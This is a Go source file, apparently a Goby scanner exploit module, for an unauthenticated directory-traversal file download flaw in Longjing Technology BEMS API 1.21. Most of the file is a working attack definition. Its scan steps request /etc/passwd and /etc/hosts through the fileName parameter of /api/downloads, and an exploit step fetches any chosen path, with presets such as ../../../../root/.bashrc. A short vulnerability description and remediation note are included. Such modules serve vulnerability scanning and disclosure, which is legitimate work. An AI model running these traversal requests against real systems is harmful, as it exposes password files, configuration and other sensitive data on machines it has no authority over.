-
Notifications
You must be signed in to change notification settings - Fork 197
/
Longjing_Technology_BEMS_API_1.21_Remote_Arbitrary_File_Download.go
143 lines (140 loc) · 4.48 KB
/
Longjing_Technology_BEMS_API_1.21_Remote_Arbitrary_File_Download.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
package exploits
import (
"git.gobies.org/goby/goscanner/goutils"
)
func init() {
expJson := `{
"Name": "Longjing Technology BEMS API 1.21 Remote Arbitrary File Download",
"Description": "The application suffers from an unauthenticated arbitrary file download vulnerability. Input passed through the fileName parameter through downloads endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks.",
"Product": "Battery Energy Management System",
"Homepage": "http://www.ljkj2012.com",
"DisclosureDate": "2021-08-01",
"Author": "[email protected]",
"GobyQuery": "server=\"nginx/1.19.1\"",
"Level": "2",
"Impact": "<p><span style=\"font-size: 14px;\">The vulnerability of arbitrary file download or read is mainly caused by the fact that when the application system provides the function of file download or read, the application system directly specifies the file path in the file path parameter without verifying the validity of the file path. As a result, the attacker can jump through the directory (.. </span><span style=\"font-size: 14px;\"> \\ or.. </span><span style=\"font-size: 14px;\"> /) to download or read a file beyond the original specified path. </span><span style=\"font-size: 14px;\"> The attacker can finally download or read any files on the system through this vulnerability, such as database files, application system source code, password configuration information and other important sensitive information, resulting in sensitive information leakage of the system. </span><br></p>",
"Recommandation": "<p><span style=\"font-size: 14px;\">Limit ../ </span><span style=\"font-size: 14px;\">The best way is that the file should be in the database for one to one mapping, avoid entering the absolute path to obtain the file </span><br></p>",
"References": [
"https://www.exploit-db.com/exploits/50163"
],
"HasExp": true,
"ExpParams": [
{
"name": "path",
"type": "createSelect",
"value": "../../../etc/passwd,../../../../etc/hosts,../../../../root/.bashrc",
"show": ""
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/api/downloads?fileName=../../../etc/passwd",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "root",
"bz": ""
}
]
},
"SetVariable": []
},
{
"Request": {
"method": "GET",
"uri": "/api/downloads?fileName=../../../etc/hosts",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "OR",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "127.0.0.1",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "localhost",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/api/downloads?fileName={{{path}}}",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"SetVariable": [
"output|lastbody"
]
}
],
"Tags": [
"file download"
],
"CVEIDs": null,
"CVSSScore": "0.0",
"AttackSurfaces": {
"Application": ["Battery Energy Management System"],
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}`
ExpManager.AddExploit(NewExploit(
goutils.GetFileName(),
expJson,
nil,
nil,
))
}